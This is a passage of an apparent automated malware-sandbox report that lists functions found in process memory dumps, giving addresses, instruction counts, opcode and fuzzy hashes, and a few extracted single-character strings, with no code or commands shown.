Instruction ID: 9b6de75addd176d489b371e82c879ab49678c9ccd9503104bd933c88d6e57d4b
Opcode Fuzzy Hash: b6ae0717bebab51020ed5c52c8b53abe33a18476a29c6ffd47a3b5a42d671ade
Instruction Fuzzy Hash: 90F0813190C68A8FEB94AF68881A2A97BE0FF16705F4546BAE40DD2192DE296650C742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C59C65, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87acce2c99a6cb57c5fc41ec2781ebcf73c97b4ffdbd77837e4c5d6b804576b9
Instruction ID: 983cd9f41bc7614eaa7e44d142141a55d38ebbe004f9480929f5e0b892542e9e
Opcode Fuzzy Hash: 87acce2c99a6cb57c5fc41ec2781ebcf73c97b4ffdbd77837e4c5d6b804576b9
Instruction Fuzzy Hash: F9F0442790C7960FD715A76DA8B21E57FB0AF43625B8985F7C08CCA4E3DD0D184A8B92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C605C1, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 439c0573c5abed1638159b26258c998b4ca36e3088cabef6b1fd79c217fe3048
Instruction ID: eb37e417c4f3447eb3b79373784b1dd69cd90687ff32f10c104365cad1db166e
Opcode Fuzzy Hash: 439c0573c5abed1638159b26258c998b4ca36e3088cabef6b1fd79c217fe3048
Instruction Fuzzy Hash: 19F0C822C0C68A8FEB95AB6C48292F97FE0EF17704F4885F6D40CE20D3DE2A55449741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C58842, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c474938efe296c650d8c4e35153a4f8d30c60b3c33fff58b6ad5354b8634e411
Instruction ID: f4116e0dbd00bb0fff830b501bab4043c43329b195bb1aa3bc622ade4de40d6f
Opcode Fuzzy Hash: c474938efe296c650d8c4e35153a4f8d30c60b3c33fff58b6ad5354b8634e411
Instruction Fuzzy Hash: 30F06D7191890E8FEB94EF5C988A6FEB7E0FF59304F0441B6E40CD2150DE70A691DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C57FD1, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ab27249cb078530fa0ccdf9d45fc65ea612de6566bed3ae2a317b03d45fe58
Instruction ID: 93af064604b659ee1bbd4fd3909faf433321485299b59d2b9d7df87417b54c9e
Opcode Fuzzy Hash: 73ab27249cb078530fa0ccdf9d45fc65ea612de6566bed3ae2a317b03d45fe58
Instruction Fuzzy Hash: 25F0AD36D0460A8FEB54DB89C840BF973B1EB45351F00857AE00EE3281DE792942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C60AAD, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13768c065e224c50321fd8d42ba0849064db98ec404e745e145d781fdbf8f78b
Instruction ID: 979a143667e98fd9cc09c74da975bc21881e8cf9b67239f5affb3208630c1809
Opcode Fuzzy Hash: 13768c065e224c50321fd8d42ba0849064db98ec404e745e145d781fdbf8f78b
Instruction Fuzzy Hash: 2FF0BB35C1C68A8FE755ABB8881A2F97BE0EF16704F4485F7D00CD64D3DE285594C752

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C5B54D, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e09ca7eb72758280db4e6e90b96a1700085d41d5d674a5409f16de08c952352d
Instruction ID: 544409ee059b605dd7ec16376d86ed2fa1703d3ae629bd6c3b02767cd6c0abf6
Opcode Fuzzy Hash: e09ca7eb72758280db4e6e90b96a1700085d41d5d674a5409f16de08c952352d
Instruction Fuzzy Hash: C6F06231C1C64A9FE755ABA8481A7A97FE0AF16309F8489F7E00DC6092DD295054C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C59BE9, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dfe0e41de1dd01ac24fdf0ae755787c31429090802a3741dbc48c8c87ccbde0
Instruction ID: c5a6fe39438e11019bc8879a0df1c217a26ea1b99459cfffb61b05780ed3fec1
Opcode Fuzzy Hash: 4dfe0e41de1dd01ac24fdf0ae755787c31429090802a3741dbc48c8c87ccbde0
Instruction Fuzzy Hash: 3DF0C221D1C78B8FE7699B6848262A5AAF0BF17605F8846F6D04DC21D3DD1D6408C752

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C58C59, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b37feb8579005f0ab321dab9906d14333d7d0132c0106be2d8df5077a101206e
Instruction ID: 2898fcca7856a6389627c6c3dc51acabcc05f24a3cfc45c4f563de08706cadf9
Opcode Fuzzy Hash: b37feb8579005f0ab321dab9906d14333d7d0132c0106be2d8df5077a101206e
Instruction Fuzzy Hash: AEF0AF22C0D78B8FE7699BA84C262A57BE0BF17654F9846FAD05CC70E3DD1D2808C752

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C50A79, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091bc4b5869a7cd52bd635f5fdd47c44faae5437a509919c494b056fa9b12f5d
Instruction ID: 952b8254276d607a15d0fdb9b391d06e26d7a5c297b6d7f62849030485b9ba02
Opcode Fuzzy Hash: 091bc4b5869a7cd52bd635f5fdd47c44faae5437a509919c494b056fa9b12f5d
Instruction Fuzzy Hash: 95F0CD3280D38A8FDB559F6888452ED7FB0EF06305F4444A6D40CD2092DA389544C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C5B970, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2afabe8448f54980a21e95d5d212892c1d92dd2d1c2cfe94d0d4db48d3a2c7c
Instruction ID: 3d9888c194e12dd03d8d81b82a1deba91b3b79c47f352e92fa12b298e365f46e
Opcode Fuzzy Hash: b2afabe8448f54980a21e95d5d212892c1d92dd2d1c2cfe94d0d4db48d3a2c7c
Instruction Fuzzy Hash: 26F0963580864E8EDB54AF6888096F97BE0FF05309F4045BAE41DC2191DE355550C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C577B8, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e23c579e1887ea42396ef590b7163cbc8ee8d1823625ff95c4e8b8c93760808
Instruction ID: b40a635a9a1cd88e4df0479737e7b049154c83cd245b445748c22d9b74755daa
Opcode Fuzzy Hash: 0e23c579e1887ea42396ef590b7163cbc8ee8d1823625ff95c4e8b8c93760808
Instruction Fuzzy Hash: 23F0F43190868ECFDB94DF18C841AA937E0FF19304F404465F81EC3250CA34AA64EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C508E0, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 452479f8fbaa565d03abaa5c6daab62a8e54a58eebfcc7d592148dba564ca4db
Instruction ID: ca125da831c58975442dc408bdf2b706475ab9967162d18061da7f730321a4d2
Opcode Fuzzy Hash: 452479f8fbaa565d03abaa5c6daab62a8e54a58eebfcc7d592148dba564ca4db
Instruction Fuzzy Hash: F6F0E232C1C78E5EF7609BB898087F87BE0EB06709F444875E04DE2092DE762594D382

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C57B20, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 689efea9204414ce18b6a544115742794609b1f5fd934136605547dd4c45b8f1
Instruction ID: faf3d90e438c97584933b9cdb1d63e6fd96684ba510e452d986fbf3a0c284ae9
Opcode Fuzzy Hash: 689efea9204414ce18b6a544115742794609b1f5fd934136605547dd4c45b8f1
Instruction Fuzzy Hash: D2F03A3181860E9FEBA0EF6884496BA7BE1FF59305F54857AE80DC2150DA35A2A0DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C50A29, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbec354f89def36e2db1bb46b29500e6707c7bb49fa1b82408ed224de9ae2147
Instruction ID: fd6f6985ebf04647ae1be0633aa600bc73bb11e788b3b385d51338ee32545854
Opcode Fuzzy Hash: dbec354f89def36e2db1bb46b29500e6707c7bb49fa1b82408ed224de9ae2147
Instruction Fuzzy Hash: 7EF05E31C5D2899FEB51ABA488096E97FF0AF16304F4559F7D40CD70A3DA286558C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C60360, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ea8aea7e60d78465954c6e3cc59e0c2c9b2a0990f0337e8b118052127fc2203
Instruction ID: a6b4e27e6cc7781e93e7ac4b97f899ad02b3432673ce0df1b6184d5b5009e690
Opcode Fuzzy Hash: 1ea8aea7e60d78465954c6e3cc59e0c2c9b2a0990f0337e8b118052127fc2203
Instruction Fuzzy Hash: 25F09A3580864ACFDBA8DF6888012F972E0BF02305F4485BAE41CD21C2DE39A654D741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C50661, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 686550fd26e5ec32e4a1229339723b3e1bbca07999bf596cf2dfb7bc26ff9125
Instruction ID: fa4a68717251130b417f9cfc5d06081dbca54a8b2441e003753d5d130db521a7
Opcode Fuzzy Hash: 686550fd26e5ec32e4a1229339723b3e1bbca07999bf596cf2dfb7bc26ff9125
Instruction Fuzzy Hash: 1FF06731D0422A8FEB04AF99D8946EDB3B0FBA8716F408539E409F6282DF781448CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C62F99, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e94932ddb5826706bc6d9ac3e64163b8fecebbfbeb81157a6905f037eebfd29
Instruction ID: 1ca024b7c3ded935c0c43342969a6677fc6a52523200b392d2d94433e0b46f71
Opcode Fuzzy Hash: 4e94932ddb5826706bc6d9ac3e64163b8fecebbfbeb81157a6905f037eebfd29
Instruction Fuzzy Hash: 41F0A03180D38A8FD3125B208C021E63B64AF07300F0945B6E40D860E3DE2C6928C752

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C6B090, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23a25f5172e0fe8bf26d8942dd7fd30f3eea77eaa7f3e68f425856418ec3717a
Instruction ID: 8ef9fda47eb9f98f6ea8d635d9528ad93a9492cbfa4ac04a2d87cae6c70e3e24
Opcode Fuzzy Hash: 23a25f5172e0fe8bf26d8942dd7fd30f3eea77eaa7f3e68f425856418ec3717a
Instruction Fuzzy Hash: 57E04F31C6860E9EEB90FB6884496FD7BE4EF0A309F548872E52CC2051DE356294C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C58912, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a0957363ad06b1e96462b86e5b9a5331539ddd5bd2c2ee71f3745cd94bec21
Instruction ID: 16f63d2dee6c2abad91729cc67acae3a75bcf050cfee4aae9d198e0778e7da1d
Opcode Fuzzy Hash: 11a0957363ad06b1e96462b86e5b9a5331539ddd5bd2c2ee71f3745cd94bec21
Instruction Fuzzy Hash: 88E09A3260800B8FDB10EB88D880AFD33B1FB82712F004B6AC059E3294CEB92504AB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C57B10, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a56983e6295a7d1131d742e8771a430c284207df2d149328e0bfbba8bb9b72f7
Instruction ID: f74a4a7def91bb130ea43dd6a8bbf51074f3c6a8b87de6b0d8332d8434bafdfa
Opcode Fuzzy Hash: a56983e6295a7d1131d742e8771a430c284207df2d149328e0bfbba8bb9b72f7
Instruction Fuzzy Hash: F0E09A3191C20E8FDB51EF6888041FEB7A0FF02B08F048575E81D43180CE386720EA41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C57E7A, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4e6c0ad69fa660d9f3772f5959cbbc72d60a1a2603660447009ce8abbf4d428
Instruction ID: 829474b01d4c1e2defbfb7f550d44588f934c8a7218b2afdbd40f5da52e9cc36
Opcode Fuzzy Hash: e4e6c0ad69fa660d9f3772f5959cbbc72d60a1a2603660447009ce8abbf4d428
Instruction Fuzzy Hash: E2E0463290810ACFEB14EB8AC440AA973E1EB52355F008A2AD00AD72A1CEBA6581DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C506AE, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee5dca6d0a821d5ef798f8620280375483f2e83f819ddee35e05ffc9559e888
Instruction ID: cd4117f77bf58a987ac82bf7f7fc0840089733164ff01a5fb5c7c3157b0f74af
Opcode Fuzzy Hash: 3ee5dca6d0a821d5ef798f8620280375483f2e83f819ddee35e05ffc9559e888
Instruction Fuzzy Hash: 3EE0C23290801BCFEF00DB89C8441EE73A0FB95716F008221C409F6285DF3C60488F44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C5A617, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f86e29fb364cf1f4a4f8458ccc010a48e4d2fe4603198f91b3b221ea9fdc16a5
Instruction ID: e0629c09300b58abd7392c35daf9e1dee0c56a47c59ae2be164f3d915322dad4
Opcode Fuzzy Hash: f86e29fb364cf1f4a4f8458ccc010a48e4d2fe4603198f91b3b221ea9fdc16a5
Instruction Fuzzy Hash: 1FD0A735A04A4A8ED2D4D75CA8542E8A7F2EB85605F8440E6841DD3142CD291C419600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C57F98, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 100854deaa0560912ea0359bc90214e163d0ab32fe1c00a2778c4b7f4b5349a6
Instruction ID: 9edc01af3f1d85705c4b6fcaefb9206558b834e20be792ea889cc863a7a02538
Opcode Fuzzy Hash: 100854deaa0560912ea0359bc90214e163d0ab32fe1c00a2778c4b7f4b5349a6
Instruction Fuzzy Hash: CBB09211A8A90A4FE690A75D900057622E5AB8B60A7E09C74811DD21A2CC6B2880A311

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C63FE3, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb648d1cda245c3a608ff97e7ac04b19e7178183d7e73451f6829a50bfe92dd
Instruction ID: cc0364dce98bcb6d12cdb5a5113f7be5371ab9c0a9a218e0a80286a7a1f92ea8
Opcode Fuzzy Hash: ecb648d1cda245c3a608ff97e7ac04b19e7178183d7e73451f6829a50bfe92dd
Instruction Fuzzy Hash: A9C08C7180815A8EEB448F04CC806BE36B0AF06705F00003DE08EA32C0CF399400EA14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C50614, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d84989fb1402c5240cd5f45dc40866022febc3a839f4a565248f119afff0c02
Instruction ID: 9dae48e9549d0b1a63b7b38cca80cf20730024ea2979f9a77262969c6428f70a
Opcode Fuzzy Hash: 9d84989fb1402c5240cd5f45dc40866022febc3a839f4a565248f119afff0c02
Instruction Fuzzy Hash: B2A01220C006098EBB80AB58040416A21B0B7545027C04129801CD1191CE190400C200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C5834A, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b66d8ea70a23e670ae1eff8cd3f011692a70aeac40b3aa189ccaeff4badf4ec8
Instruction ID: 6a169f40f184cabc8611605c970e763fd5fe33498e879cb9a3c587ed500e2093
Opcode Fuzzy Hash: b66d8ea70a23e670ae1eff8cd3f011692a70aeac40b3aa189ccaeff4badf4ec8
Instruction Fuzzy Hash: 1DB09221C080078EE600DB9EC000A7D23E09F02749F108838E01D46191CE2E2485AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C58175, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f894f9e905f04f185bd7ab5125883a8f5b1a646a02220b95904ae4643de7f5b
Instruction ID: 8ef1a4219cc81a265ee64893ef96d315aafbfeeae90adf159982832d6c125443
Opcode Fuzzy Hash: 5f894f9e905f04f185bd7ab5125883a8f5b1a646a02220b95904ae4643de7f5b
Instruction Fuzzy Hash: DBB01231C0C10B48EB285B9A40016FE10904F01789E008839900F000C1CD7E91813A40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFA35C64B81, Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

*, xrefs: 00007FFA35C65902
), xrefs: 00007FFA35C64B88
p, xrefs: 00007FFA35C64BC5
z, xrefs: 00007FFA35C65963

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID: )$*$p$z
API String ID: 0-3936156169
Opcode ID: f06af3c6863717635af638a7d594b57c82d9ab29ca1cfc76142b7fcd68981423
Instruction ID: efcd8e09783fe55f5a31d884299b2c7bf50e559283c64703e40c2608452373bb
Opcode Fuzzy Hash: f06af3c6863717635af638a7d594b57c82d9ab29ca1cfc76142b7fcd68981423
Instruction Fuzzy Hash: 2E413671D0862A8FEB98DF48C8A47EDB3B1FF45308F5481A9D40D97292DF796A84DB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: audiodg.exe PID: 6636 Parent PID: 968 audiodg.exeCOMMON

Executed Functions

Function 00007FFA35C5EDC6, Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.915265495.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f82896d64cc15757013ded64e49c9f55670eb49f7d73276b8add1a15ced2693b
Instruction ID: 8469b5218204de9e015abd307c82f8888a3312fdae785f9d39795f162a191630
Opcode Fuzzy Hash: f82896d64cc15757013ded64e49c9f55670eb49f7d73276b8add1a15ced2693b
Instruction Fuzzy Hash: CDF1B171908A8E8FEBA8DF28C8467E937D1FF55311F04866AE84DC7291CF75A8418B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C5FB72, Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.915265495.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e610bc36dc9983e21f27f88fe6ea81eb674620657ab809582be0bdb136ab6b8
Instruction ID: 887cd2d5eab19d175edd57d71302abe9d9e3e42e9dacb04d6b9e29c03bb40eba
Opcode Fuzzy Hash: 8e610bc36dc9983e21f27f88fe6ea81eb674620657ab809582be0bdb136ab6b8
Instruction Fuzzy Hash: 7BE1C471908A8E8FEBA8DF28C8557E937D1EF55711F04867EE80DC7291CE79A8448B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C57F1D, Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

0\$, xrefs: 00007FFA35C582E0
@\$, xrefs: 00007FFA35C582FA
8\$, xrefs: 00007FFA35C582ED
H\$, xrefs: 00007FFA35C58307

Memory Dump Source

Source File: 00000012.00000002.915265495.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID: 0\$$8\$$@\$$H\$
API String ID: 0-2449676401
Opcode ID: 014a21402e26af1bdd29f6b8f102792f6ce78f0f453d9df84e08b2128331b72d
Instruction ID: 668cd84a8f25bc849cb80be94b7ee2375fc46d9d58862133bcd4166c584a9b6e
Opcode Fuzzy Hash: 014a21402e26af1bdd29f6b8f102792f6ce78f0f453d9df84e08b2128331b72d
Instruction Fuzzy Hash: F821AF72E0860E8FEB59DB88C450AB877F1EF56344F5041BAD00EE72D2DD3A6941CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C5828F, Relevance: 5.1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

Strings

0\$, xrefs: 00007FFA35C582E0
@\$, xrefs: 00007FFA35C582FA
8\$, xrefs: 00007FFA35C582ED
H\$, xrefs: 00007FFA35C58307

Memory Dump Source

Source File: 00000012.00000002.915265495.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID: 0\$$8\$$@\$$H\$
API String ID: 0-2449676401
Opcode ID: 939bd1d8d963fd13ff9feb1790f97c678c80a9378198783ca292466d1d9fdfbb
Instruction ID: c118646593d9753415497cd6feb7ce5e1228f10d021f53f21620d5cc9ea0b216
Opcode Fuzzy Hash: 939bd1d8d963fd13ff9feb1790f97c678c80a9378198783ca292466d1d9fdfbb
Instruction Fuzzy Hash: F2219C72D4861A8FDB09DF98C490ABC77F1FF16344F0042BED00ADB282DA396A84CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C64D3B, Relevance: 3.8, Strings: 3, Instructions: 47COMMON

Download Yara Rule

Strings

s, xrefs: 00007FFA35C65BF4
=, xrefs: 00007FFA35C65AC8
m, xrefs: 00007FFA35C64D5E

Memory Dump Source

Source File: 00000012.00000002.915265495.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID: =$m$s
API String ID: 0-3358075408
Opcode ID: 1209b9f6fc2dffb744674f19145124a1a7fa735090b6959a7bcd505dc8bcac4f
Instruction ID: 1ff7734989890f4f903c43c2baf63b43b1ec698713e808b02f7ed0f8bb8f3da7
Opcode Fuzzy Hash: 1209b9f6fc2dffb744674f19145124a1a7fa735090b6959a7bcd505dc8bcac4f
Instruction Fuzzy Hash: 60113D3590821A8FEB94DF08C8A06B873B1FF55709F14816AD40DD7281EF79AA81EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C50565, Relevance: 2.6, Strings: 2, Instructions: 106COMMON

Download Yara Rule

Strings

\$, xrefs: 00007FFA35C5071B
(\$, xrefs: 00007FFA35C50693

Memory Dump Source

Source File: 00000012.00000002.915265495.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID: \$$(\$
API String ID: 0-2328146480
Opcode ID: d9b0289f4072a4cfd5379b9681ab4a941a8746753255349a3b8b1d5925937056
Instruction ID: faad29d3c8ce6c4e49eb82cbb6db63d12bb4df9271562ff8d8a6a69411b00e2c
Opcode Fuzzy Hash: d9b0289f4072a4cfd5379b9681ab4a941a8746753255349a3b8b1d5925937056
Instruction Fuzzy Hash: 29418C72C0861A8FEB00DB99C8053EDBBB1BF9A306F50857AD408F6282DF395548DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C64DEC, Relevance: 2.5, Strings: 2, Instructions: 37COMMON

Download Yara Rule

Strings

S, xrefs: 00007FFA35C64DEC
4, xrefs: 00007FFA35C64F6B

Memory Dump Source

Source File: 00000012.00000002.915265495.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID: 4$S
API String ID: 0-3752424886
Opcode ID: cc274c1705cbf0c12d5cd2dfb8b4730e4f2f4a4ece16f7dc2f3007afefd6683e
Instruction ID: 636e2d3177af98d20913a02e9328343c76302f12c2a44edd1c84195db061d48a
Opcode Fuzzy Hash: cc274c1705cbf0c12d5cd2dfb8b4730e4f2f4a4ece16f7dc2f3007afefd6683e
Instruction Fuzzy Hash: D7011B7191922A8FEB54DF44D8A47FC72B0BF11709F14817DE44D96292DFB96A84EA00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C5893F, Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

[ , xrefs: 00007FFA35C5899E, 00007FFA35C589CB

Memory Dump Source

Source File: 00000012.00000002.915265495.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID: [
API String ID: 0-2249208011
Opcode ID: 5ff96467b876f2525ab20b4364092fcd81f81b086187f859c20a491391135f40
Instruction ID: a7351352ab08ca37b087cd682bc568fcf89af96902985b30478cd97ab9eaa9b1
Opcode Fuzzy Hash: 5ff96467b876f2525ab20b4364092fcd81f81b086187f859c20a491391135f40
Instruction Fuzzy Hash: 7531C072D0865F8FEB119BE988052BC7AE0BF07719F1049BAD04DE71C3DE692540D785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C50614, Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

(\$, xrefs: 00007FFA35C50693

Memory Dump Source

